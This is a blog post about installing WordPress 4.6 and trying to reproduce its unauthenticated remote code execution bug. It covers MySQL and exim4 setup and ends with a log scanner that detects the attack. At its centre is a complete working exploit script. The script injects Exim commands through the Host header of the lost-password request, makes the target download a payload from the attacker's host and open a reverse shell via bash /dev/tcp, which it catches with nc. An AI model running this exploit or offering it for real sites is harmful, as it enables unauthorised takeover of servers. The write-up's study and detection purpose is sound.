
Installing WordPress and problems reproducing the 4.6 vulnerability

It feels like every day at school is spent revising for exams... so many exams, and another one every few days!

But after the WordPress 4.6 vulnerability was disclosed, I also wanted to taste the satisfaction of reproducing it.
But... the conditions for this PoC are very strict, and I'm still pretty green... so I still haven't succeeded.
This post mainly writes up the problems I ran into while trying to reproduce it.

Installing WordPress 4.6

My very first blog was built on WordPress, so I know the drill; there are plenty of tutorials online for the actual steps.
Here is the 4.6 install package: WordPress4.6.zip
Below are the problems you may run into during installation.

Extracting the WordPress package

Extracting first and then dragging the files onto the VPS is slow; upload the zip archive instead and extract it on the server.
Sometimes you want to extract into a specific directory, for example /www/wwwroot/www.flywinky.info/, which you can do like this:

unzip xx.zip -d /www/wwwroot/www.flywinky.info/

MySQL database cannot be reached - 1

I have no idea why this happens every single time I set it up.
If the error says the username or password is wrong, you can do the following.

First stop MySQL

sudo /usr/local/mysql/support-files/mysql.server stop

Start it in safe mode

sudo mysqld_safe --skip-grant-tables

Log in to MySQL without a password

First you need to open another shell and run the following:

mysql -u root
mysql> UPDATE mysql.user SET Password=PASSWORD('你的新密码') WHERE User='用户名';

Restart MySQL

sudo /usr/local/mysql/support-files/mysql.server start

MySQL database cannot be reached - 2

Even after resetting the password, sometimes you no longer know which database name you actually created....
WordPress asks for the database name during setup; you can look it up from the shell as follows.
Connect to MySQL

mysql -u root -ppassword

Here you may hit the problem shown in the screenshot below; this is because there is no space between "-p" and "password".
[screenshot: WordPress4.6]

List the database names

show databases;

PS: some other database commands

Cannot change themes or plugins

Installing a plugin or theme from the admin panel prompts for FTP credentials.
This is a file-permission problem on the web root; log in to the VPS and run:

chmod -R 755 /home/wwwroot
chown -R www /home/wwwroot

Using the PoC

The PoC throws an error

As in the screenshot below, this is because editing the file on Windows leaves \r (CRLF) line endings, which make the script fail on Linux.

[screenshot: wordpress4.6-2]

Strip the '\r' with a regular expression, or fix it like this:

yum install dos2unix
dos2unix **.sh

Modifying the PoC

First, change the host address to the target machine's IP.
Then user_login=admin: the admin here must be a username that actually exists on the target.
Also, the target must have exim4 installed.

sudo apt-get install exim4

Configure it with the command below; for the first question choose the first option, "internet site; mail is sent and received directly using SMTP",
then accept the defaults for everything else.

dpkg-reconfigure exim4-config

PS: installing exim4

Finally, here is the original (foreign) author's PoC

    rev_host="192.168.57.1" #1
    function prep_host_header() {
      cmd="$1"
      rce_cmd="\${run{$cmd}}";
      # replace / with ${substr{0}{1}{$spool_directory}}
      #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
      rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
      # replace ' ' (space) with
      #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
      rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
      #return "target(any -froot@localhost -be $rce_cmd null)"
      host_header="target(any -froot@localhost -be $rce_cmd null)"
      return 0
    }
    #cat exploitbox.ans
    intro="
    DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
    bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
    G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
    G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
    IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
    IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
    X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
    b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
    NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
    TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
    QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
    NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
    G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
    eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
    WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
    TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
    ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
    MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
    G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
    WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
    NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
    MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
    X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
    bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
    intro2="
    ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
    fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
    MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
    ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
    aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
    fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
    ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
    bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
    ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
    ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
    bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
    cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
    echo "$intro"  | base64 -d
    echo "$intro2" | base64 -d
    if [ "$#" -ne 1 ]; then
      echo -e "Usage:\n$0 target-wordpress-url\n"
      exit 1
    fi
    target="$1"
    echo -ne "\e[91m[*]\033[0m"
    read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
    echo
    if [ "$choice" == "y" ]; then
      echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
      echo -e "\e[92m[+]\033[0m Connected to the target"
      # Serve payload/bash script on :80
      RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
      echo "$RCE_exec_cmd" > rce.txt
      python -mSimpleHTTPServer 80 2>/dev/null >&2 &
      hpid=$!
      # Save payload on the target in /tmp/rce
      cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
      prep_host_header "$cmd"
      curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword #2
      echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
      # Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
      cmd="/bin/bash /tmp/rce"
      prep_host_header "$cmd"
      curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword & #3
      echo -e "\n\e[92m[+]\033[0m Payload executed!"
      echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
      nc -vv -l 1337
      echo
    else
      echo -e "\e[92m[+]\033[0m Responsible choice ;)
    Exiting.\n"
      exit 0
    fi
    echo "Exiting..."
    exit 0
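Seen from the defender's side, the PoC above only works because the Host header ends up in the mail sender address and is handed to Exim for string expansion. As an added example (not part of the original post or of the PoC author's code), here is a small scanner over constructed Apache access-log lines that flags such requests; it assumes a LogFormat that records the Host header (%{Host}i) as the final quoted field.

```python
import re

# Constructed Apache access-log lines (combined format extended with the Host
# header as the last quoted field, i.e. LogFormat "... \"%{Host}i\"").  The
# second line carries an Exim string-expansion payload of the kind the PoC above
# smuggles through the Host header; the other two are benign.
SAMPLE_LOG = r'''
203.0.113.5 - - [06/May/2017:20:59:01 +0800] "POST /wp-login.php?action=lostpassword HTTP/1.1" 200 1234 "-" "curl/7.47.0" "blog.example.test"
203.0.113.9 - - [06/May/2017:20:59:02 +0800] "POST /wp-login.php?action=lostpassword HTTP/1.1" 200 1234 "-" "curl/7.47.0" "target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}id}} null)"
198.51.100.2 - - [06/May/2017:20:59:03 +0800] "GET /index.php HTTP/1.1" 200 5678 "-" "Mozilla/5.0" "blog.example.test"
'''

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<host>[^"]*)"$')
PLAIN_HOST = re.compile(r'^[A-Za-z0-9.\-]+(:\d{1,5})?$')      # hostname[:port] only
EXIM_EXPANSION = re.compile(r'\$\{(run|substr)\{')            # ${run{...}} / ${substr{...}}
SENDMAIL_BE = re.compile(r'(^|\s)-be(\s|$)')                  # exim -be: expansion test mode
LOST_PASSWORD = re.compile(r'^/wp-login\.php\?action=lostpassword')


def analyse_line(line):
    """Return the request's source, Host header and the reasons it is suspicious
    (empty list if it looks benign); None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    host = m.group('host')
    reasons = []
    if not PLAIN_HOST.match(host):
        reasons.append('Host is not a plain hostname[:port]')
    if EXIM_EXPANSION.search(host):
        reasons.append('Exim string expansion in Host')
    if SENDMAIL_BE.search(host):
        reasons.append('sendmail -be flag in Host')
    if reasons and LOST_PASSWORD.match(m.group('path')):
        reasons.append('aimed at the lost-password mail path')
    return {'ip': m.group('ip'), 'path': m.group('path'), 'host': host, 'reasons': reasons}


def scan(log_text):
    """Return the analyses of all lines that raised at least one reason."""
    findings = []
    for line in log_text.strip().splitlines():
        result = analyse_line(line)
        if result and result['reasons']:
            findings.append(result)
    return findings
```

Any Host header that is not a plain hostname[:port] deserves a look even without the Exim markers; setting ServerName together with UseCanonicalName On stops Apache from copying the client-supplied Host into SERVER_NAME in the first place.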

PS: full exploitation details (blocked in China; needs a proxy to reach)
PoC demo

posted @ 2017-05-06 20:59  bay1